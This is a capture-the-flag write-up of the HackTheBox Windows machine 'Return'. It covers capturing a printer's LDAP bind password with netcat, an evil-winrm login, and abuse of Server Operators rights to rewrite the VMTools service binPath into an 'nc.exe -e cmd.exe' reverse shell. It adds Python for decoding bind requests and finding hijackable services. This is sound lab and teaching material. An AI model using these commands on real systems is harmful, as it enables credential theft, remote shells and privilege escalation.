Return is a Windows machine on HTB rated as easy. The box is built around Windows services with weak service permissions. In summary, we abuse a printer admin portal to capture hardcoded credentials with netcat and use them for a WinRM login. The printer service account is a member of the Server Operators group, which allows it to stop and start services. We then abuse that permission on a weakly configured service to execute our malicious executable.
Table of Contents
Initial Access
- Enumeration
- Credential Dumping
- WinRM Valid Account
- User Flag
Privilege Escalation
- Abusing weak service permission
- Root flag
Let's dive into this.
Initial Access
First, we run an Nmap scan against the machine's IP address to find the open ports. Several ports are open, and the Microsoft services identified on them tell us it is a Windows operating system.
nmap -sV -sC 10.129.31.219
Enumeration
Since port 80 is open, let's access the IP address through a browser.
As you can see, we have access to a printer admin panel. The pages are running PHP. Let's navigate to the Settings tab.
The settings page shows us the username, svc-printer, and a hardcoded password that has been masked. The server address field is the only field that acts as a parameter when the Update button is pressed. So the printer authenticates to the local address on port 389, which is the LDAP port.
What if we replace the server address with the attacking machine's IP address, keeping port 389?
Credential Dumping
Once we have replaced the server address with the attacker's IP (Kali Linux), we launch a Netcat listener on port 389 on our Kali machine.
nc -lvp 389
Once we hit the Update button, the printer connects to our listener and attempts an LDAP simple bind, which carries the password in cleartext, so we obtain the password "1edFg43012!!" directly in the netcat output.
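Netcat shows the raw bytes of that connection; what arrives is a BER-encoded LDAP BindRequest whose DN and password are plain OCTET STRINGs, which is exactly why the trick works and why it would not work against a SASL or LDAPS bind. The following Python is an added example for this writeup (not code from the original post): it decodes a simple BindRequest, and `capture_bind` listens on the port like `nc -lvp 389` does but prints the fields properly. The sample message is constructed here with `build_simple_bind`; the DN format `return\svc-printer` is an assumption for illustration, not a capture from the box.

```python
"""Decode an LDAP simple BindRequest (RFC 4511) as seen on port 389.

Added example for this writeup, not part of the original post. A simple bind
carries the bind DN and password as cleartext BER OCTET STRINGs, which is why
pointing the printer's LDAP server address at the attacker leaks the password.
The sample bytes below are constructed here, not captured from the HTB box.
"""
import socket
from typing import Tuple


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Parse one BER TLV at buf[pos]; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length: next n bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _encode_tlv(tag: int, value: bytes) -> bytes:
    """Encode one BER TLV with a short or long-form length."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def parse_simple_bind(msg: bytes) -> Tuple[int, str, str]:
    """Return (ldap_version, bind_dn, password) from one LDAPMessage.

    Raises ValueError if the message is not a *simple* BindRequest, i.e. when
    the credentials would not be visible in the clear (SASL/GSSAPI binds).
    """
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:                               # LDAPMessage SEQUENCE
        raise ValueError("not an LDAPMessage SEQUENCE")
    _tag, _msg_id, pos = _read_tlv(body, 0)       # messageID INTEGER
    tag, bind, _ = _read_tlv(body, pos)
    if tag != 0x60:                               # [APPLICATION 0] BindRequest
        raise ValueError("not a BindRequest (tag 0x%02x)" % tag)
    _tag, ver, pos = _read_tlv(bind, 0)           # version INTEGER
    version = int.from_bytes(ver, "big")
    _tag, dn, pos = _read_tlv(bind, pos)          # name LDAPDN (OCTET STRING)
    tag, cred, _ = _read_tlv(bind, pos)
    if tag != 0x80:                               # simple [0] OCTET STRING
        raise ValueError("not a simple bind; password is not in the clear")
    return version, dn.decode("utf-8"), cred.decode("utf-8")


def build_simple_bind(dn: str, password: str, msg_id: int = 1) -> bytes:
    """Encode a simple BindRequest (used here only to construct test input)."""
    bind = (_encode_tlv(0x02, b"\x03")            # version 3
            + _encode_tlv(0x04, dn.encode())
            + _encode_tlv(0x80, password.encode()))
    body = _encode_tlv(0x02, bytes([msg_id])) + _encode_tlv(0x60, bind)
    return _encode_tlv(0x30, body)


def capture_bind(port: int = 389) -> Tuple[int, str, str]:
    """Listen once (like `nc -lvp 389`) and decode the first BindRequest."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            return parse_simple_bind(conn.recv(4096))


# Constructed sample: assumed DN, password as the writeup recovered it.
SAMPLE_BIND = build_simple_bind("return\\svc-printer", "1edFg43012!!")

if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND))
```

Run `capture_bind()` as root (port 389 is privileged) before pressing Update and it returns the version, DN and password instead of a raw byte dump; if it raises because the bind is not simple, netcat would not have shown a password either.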
WinRM Valid Account
Let's use evil-winrm to establish a remote connection. This can be done by issuing the command below:
evil-winrm -i 10.129.31.219 -u svc-printer -p "1edFg43012!!"
We have access to the server. Let's browse to the Desktop directory and see if we can find any flags. Indeed, as shown in the screenshot above, we find the user.txt flag.
Privilege Escalation
Now that we have access to the machine, let's verify which user permissions or group memberships we have.
To verify this, we issue the command net user svc-printer
From the screenshot below, we can see that this user is a member of the Server Operators group.
What can a user with Server Operators group membership do?
Server Operators can start and stop services.
The Server Operators group is considered a service administrator group and can change binaries that are installed on the domain controller; read more in Microsoft's documentation on Active Directory security groups.
upload /usr/share/windows-binaries/nc.exe
So we first upload the nc.exe Windows binary with evil-winrm's built-in upload command and then enumerate the installed services for further exploitation.
services
We get a list of installed services with their binary paths, along with true/false flags indicating our privileges on each.
Abusing Weak Service Permission
Here we need to analyse which service's binary path we can modify to execute the nc.exe file.
First, we try Windows Defender, changing the binary path for WinDefend, but we get an access denied error.
sc.exe config WinDefend binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"
Then we try to modify the binary path for VMTools, and this finally works for us.
sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"
Since svc-printer is a member of Server Operators, we can restart the service to get the reverse connection. So let's stop and start the VMTools service by issuing the commands:
sc.exe stop VMTools
sc.exe start VMTools
Before starting the VMTools service, we make sure netcat is listening on port 1234, as shown below.
Once the service is stopped and started again, we get a netcat session running as the service account (SYSTEM) and can read the root flag. Note that nc.exe never reports back to the Service Control Manager, so the start times out and the process gets killed after about 30 seconds: read the flag or spawn a second shell promptly.
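Trying WinDefend first and hitting access denied was a guess; the service's security descriptor tells you in advance. On the target, `sc.exe sdshow <service>` prints the DACL as an SDDL string, and the combination needed for this attack is SERVICE_CHANGE_CONFIG (DC) to rewrite binPath plus SERVICE_START (RP) and SERVICE_STOP (WP) to bounce the service. The Python below is an added example for this writeup (not from the original post or any tool it uses) that parses such SDDL output and lists the services a given trustee can hijack this way. The two SDDL strings are constructed samples shaped like sdshow output, not the real ACLs from the box, and the trustee and right tables only cover the aliases this check needs.

```python
"""Find services whose ACL lets Server Operators reconfigure and restart them.

Added example for this writeup, not from the original post or any tool it uses.
It parses the SDDL string that `sc.exe sdshow <service>` prints and reports
which trustees hold SERVICE_CHANGE_CONFIG together with SERVICE_START and
SERVICE_STOP, the exact combination abused above. The SDDL strings below are
constructed samples for illustration, not copied from the HTB box.
"""
import re
from typing import Dict, List, Set

# Service access-right abbreviations as documented for service SDDL strings.
RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL",
}
# Well-known SDDL trustee aliases this check needs (SO = BUILTIN\Server Operators).
TRUSTEES = {"SY": "Local System", "BA": "Administrators", "IU": "Interactive Users",
            "SU": "Service Logon", "AU": "Authenticated Users",
            "SO": "Server Operators", "WD": "Everyone"}
# ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\((A|D);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)")
ABUSE_SET = {"SERVICE_CHANGE_CONFIG", "SERVICE_START", "SERVICE_STOP"}


def parse_sddl_allow(sddl: str) -> Dict[str, Set[str]]:
    """Return {trustee: rights} for the Allow ACEs in the DACL of an SDDL string.

    Deny ACEs are skipped (they would override an Allow, so treat hits as
    candidates to confirm); numeric masks, which sc.exe does not emit for
    services, raise ValueError rather than being silently ignored.
    """
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # DACL only, drop the SACL
    allowed: Dict[str, Set[str]] = {}
    for ace_type, _flags, rights, sid in ACE_RE.findall(dacl):
        if ace_type != "A":
            continue
        if rights.startswith("0x"):
            raise ValueError("numeric access mask not handled: %s" % rights)
        names = {RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                 for i in range(0, len(rights), 2)}
        allowed.setdefault(TRUSTEES.get(sid, sid), set()).update(names)
    return allowed


def abusable_by(sddl_by_service: Dict[str, str],
                trustee: str = "Server Operators") -> List[str]:
    """Services where `trustee` can change binPath and then stop/start them."""
    hits = []
    for name, sddl in sddl_by_service.items():
        rights = parse_sddl_allow(sddl).get(trustee, set())
        if "GENERIC_ALL" in rights or ABUSE_SET <= rights:
            hits.append(name)
    return hits


# Constructed samples shaped like `sc.exe sdshow` output (not the real ACLs).
SAMPLE_SDDL = {
    # Server Operators hold DC (change config) plus RP/WP (start/stop).
    "VMTools": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;CCLCSWLOCRRC;;;IU)"
               "(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    # Server Operators can start/stop but not reconfigure: the access-denied case.
    "WinDefend": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWRPWPDTLOCRRC;;;SO)(A;;CCLCSWLOCRRC;;;IU)",
}

if __name__ == "__main__":
    for svc in abusable_by(SAMPLE_SDDL):
        print("candidate for binPath hijack:", svc)
```

Feed it the real strings by running `sc.exe sdshow VMTools` (and the others from the `services` listing) in the evil-winrm shell and pasting the output into the dictionary; the same parser also answers the defensive question of which groups besides Administrators can reconfigure services on a domain controller.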
Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be contacted on LinkedIn.